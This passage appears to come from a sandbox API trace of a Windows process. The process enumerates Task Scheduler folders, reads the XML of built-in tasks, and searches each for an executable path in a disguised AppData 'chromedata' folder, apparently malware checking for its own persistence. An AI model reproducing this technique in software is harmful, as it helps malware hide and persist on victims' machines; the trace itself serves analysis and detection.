	[0099.939] IRegisteredTaskCollection:get_Item (in: This=0x63fe78, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff50) returned 0x0
	[0099.939] IRegisteredTask:get_Name (in: This=0x63ff50, pName=0x128e3c | out: pName=0x128e3c*="RacTask") returned 0x0
	[0099.939] IRegisteredTask:get_Xml (in: This=0x63ff50, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\RacEngn.dll,-501)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\RacEngn.dll,-501)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\RacEngn.dll,-502)</Description>\r\n    <URI>Microsoft\\Windows\\RAC\\RacTask</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"RACSQMTrigger\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"Application\"&gt;&lt;Select Path=\"Application\"&gt;*[System[Provider[@Name='Microsoft-Windows-CEIP'] and EventID=1007]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n    <TimeTrigger id=\"RACTimeTrigger\">\r\n      <Repetition>\r\n        <Interval>PT1H</Interval>\r\n        <StopAtDurationEnd>false</StopAtDurationEnd>\r\n      </Repetition>\r\n      <StartBoundary>2008-03-31T00:00:00Z</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT15M</RandomDelay>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{42060D27-CA53-41f5-96E4-B1E8169308A6}</ClassId>\r\n      <Data><![CDATA[$(Arg0)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.943] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\RacEngn.dll,-501)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\RacEngn.dll,-501)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\RacEngn.dll,-502)</Description>\r\n    <URI>Microsoft\\Windows\\RAC\\RacTask</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"RACSQMTrigger\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"Application\"&gt;&lt;Select Path=\"Application\"&gt;*[System[Provider[@Name='Microsoft-Windows-CEIP'] and EventID=1007]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n    <TimeTrigger id=\"RACTimeTrigger\">\r\n      <Repetition>\r\n        <Interval>PT1H</Interval>\r\n        <StopAtDurationEnd>false</StopAtDurationEnd>\r\n      </Repetition>\r\n      <StartBoundary>2008-03-31T00:00:00Z</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT15M</RandomDelay>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{42060D27-CA53-41f5-96E4-B1E8169308A6}</ClassId>\r\n      <Data><![CDATA[$(Arg0)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.993] IUnknown:Release (This=0x63ff50) returned 0x0
	[0099.993] IUnknown:Release (This=0x63fe78) returned 0x0
	[0099.993] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe78) returned 0x0
	[0099.995] ITaskFolderCollection:get_Count (in: This=0x63fe78, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0099.995] IUnknown:Release (This=0x63fe78) returned 0x0
	[0099.995] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0099.995] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x19, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0099.995] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe78) returned 0x0
	[0099.997] IRegisteredTaskCollection:get_Count (in: This=0x63fe78, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0099.997] IRegisteredTaskCollection:get_Item (in: This=0x63fe78, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff50) returned 0x0
	[0099.997] IRegisteredTask:get_Name (in: This=0x63ff50, pName=0x128e3c | out: pName=0x128e3c*="MobilityManager") returned 0x0
	[0099.997] IRegisteredTask:get_Xml (in: This=0x63ff50, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Ras\\MobilityManager</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)</SecurityDescriptor>\r\n    <Author>$(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;\r\n              &lt;Query\r\n                  Id=\"0\"\r\n                  Path=\"Application\"\r\n                  &gt;\r\n                &lt;Select Path=\"Application\"&gt;*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]&lt;/Select&gt;\r\n              &lt;/Query&gt;\r\n            &lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <GroupId>S-1-5-19</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{c463a0fc-794f-4fdf-9201-01938ceacafa}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n</Task>") returned 0x0
	[0100.000] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Ras\\MobilityManager</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)</SecurityDescriptor>\r\n    <Author>$(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;\r\n              &lt;Query\r\n                  Id=\"0\"\r\n                  Path=\"Application\"\r\n                  &gt;\r\n                &lt;Select Path=\"Application\"&gt;*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]&lt;/Select&gt;\r\n              &lt;/Query&gt;\r\n            &lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <GroupId>S-1-5-19</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{c463a0fc-794f-4fdf-9201-01938ceacafa}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.025] IUnknown:Release (This=0x63ff50) returned 0x0
	[0100.025] IUnknown:Release (This=0x63fe78) returned 0x0
	[0100.025] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe78) returned 0x0
	[0100.026] ITaskFolderCollection:get_Count (in: This=0x63fe78, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.026] IUnknown:Release (This=0x63fe78) returned 0x0
	[0100.026] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.026] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1a, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.026] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe80) returned 0x0
	[0100.028] IRegisteredTaskCollection:get_Count (in: This=0x63fe80, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0100.028] IRegisteredTaskCollection:get_Item (in: This=0x63fe80, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff68) returned 0x0
	[0100.028] IRegisteredTask:get_Name (in: This=0x63ff68, pName=0x128e3c | out: pName=0x128e3c*="RegIdleBackup") returned 0x0
	[0100.028] IRegisteredTask:get_Xml (in: This=0x63ff68, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\regidle.dll,-600)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\regidle.dll,-601)</Source>\r\n    <URI>Microsoft\\Windows\\Registry\\RegIdleBackup</URI>\r\n    <Description>$(@%systemroot%\\system32\\regidle.dll,-602)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-01-01T00:00:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>10</DaysInterval>\r\n      </ScheduleByDay>\r\n      <RandomDelay>PT1H</RandomDelay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <Priority>5</Priority>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <ComHandler>\r\n      <ClassId>{ca767aa8-9157-4604-b64b-40747123d5f2}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.031] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\regidle.dll,-600)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\regidle.dll,-601)</Source>\r\n    <URI>Microsoft\\Windows\\Registry\\RegIdleBackup</URI>\r\n    <Description>$(@%systemroot%\\system32\\regidle.dll,-602)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-01-01T00:00:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>10</DaysInterval>\r\n      </ScheduleByDay>\r\n      <RandomDelay>PT1H</RandomDelay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <Priority>5</Priority>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <ComHandler>\r\n      <ClassId>{ca767aa8-9157-4604-b64b-40747123d5f2}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.063] IUnknown:Release (This=0x63ff68) returned 0x0
	[0100.063] IUnknown:Release (This=0x63fe80) returned 0x0
	[0100.063] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe80) returned 0x0
	[0100.065] ITaskFolderCollection:get_Count (in: This=0x63fe80, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.065] IUnknown:Release (This=0x63fe80) returned 0x0
	[0100.065] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.065] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1b, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.065] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fec0) returned 0x0
	[0100.066] IRegisteredTaskCollection:get_Count (in: This=0x63fec0, pCount=0x128e30 | out: pCount=0x128e30*=0) returned 0x0
	[0100.066] IUnknown:Release (This=0x63fec0) returned 0x0
	[0100.066] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fec0) returned 0x0
	[0100.067] ITaskFolderCollection:get_Count (in: This=0x63fec0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.067] IUnknown:Release (This=0x63fec0) returned 0x0
	[0100.067] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.067] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1c, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.067] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe90) returned 0x0
	[0100.069] IRegisteredTaskCollection:get_Count (in: This=0x63fe90, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0100.069] IRegisteredTaskCollection:get_Item (in: This=0x63fe90, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff88) returned 0x0
	[0100.069] IRegisteredTask:get_Name (in: This=0x63ff88, pName=0x128e3c | out: pName=0x128e3c*="RemoteAssistanceTask") returned 0x0
	[0100.069] IRegisteredTask:get_Xml (in: This=0x63ff88, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2005-11-08T17:18:32</Date>\r\n    <Source>$(@%systemroot%\\system32\\msra.exe,-687)</Source>\r\n    <Author>$(@%systemroot%\\system32\\msra.exe,-686)</Author>\r\n    <Description>$(@%systemroot%\\system32\\msra.exe,-688)</Description>\r\n    <URI>Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask</URI>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"5a33e62f-7fb9-41d8-bc94-4ac450677743\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n      <Delay>PT15S</Delay>\r\n    </EventTrigger>\r\n    <RegistrationTrigger>\r\n      <Enabled>true</Enabled>\r\n    </RegistrationTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <Exec id=\"49b247cd-24d4-4ada-ad69-2d975a02b748\">\r\n      <Command>%windir%\\system32\\RAServer.exe</Command>\r\n      <Arguments>/offerraupdate</Arguments>\r\n      <WorkingDirectory>%windir%</WorkingDirectory>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.072] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2005-11-08T17:18:32</Date>\r\n    <Source>$(@%systemroot%\\system32\\msra.exe,-687)</Source>\r\n    <Author>$(@%systemroot%\\system32\\msra.exe,-686)</Author>\r\n    <Description>$(@%systemroot%\\system32\\msra.exe,-688)</Description>\r\n    <URI>Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask</URI>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"5a33e62f-7fb9-41d8-bc94-4ac450677743\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n      <Delay>PT15S</Delay>\r\n    </EventTrigger>\r\n    <RegistrationTrigger>\r\n      <Enabled>true</Enabled>\r\n    </RegistrationTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <Exec id=\"49b247cd-24d4-4ada-ad69-2d975a02b748\">\r\n      <Command>%windir%\\system32\\RAServer.exe</Command>\r\n      <Arguments>/offerraupdate</Arguments>\r\n      <WorkingDirectory>%windir%</WorkingDirectory>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.109] IUnknown:Release (This=0x63ff88) returned 0x0
	[0100.109] IUnknown:Release (This=0x63fe90) returned 0x0
	[0100.109] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe90) returned 0x0
	[0100.111] ITaskFolderCollection:get_Count (in: This=0x63fe90, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.111] IUnknown:Release (This=0x63fe90) returned 0x0
	[0100.111] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.111] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1d, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.111] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe80) returned 0x0
	[0100.113] IRegisteredTaskCollection:get_Count (in: This=0x63fe80, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0100.113] IRegisteredTaskCollection:get_Item (in: This=0x63fe80, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff68) returned 0x0
	[0100.114] IRegisteredTask:get_Name (in: This=0x63ff68, pName=0x128e3c | out: pName=0x128e3c*="WindowsParentalControls") returned 0x0
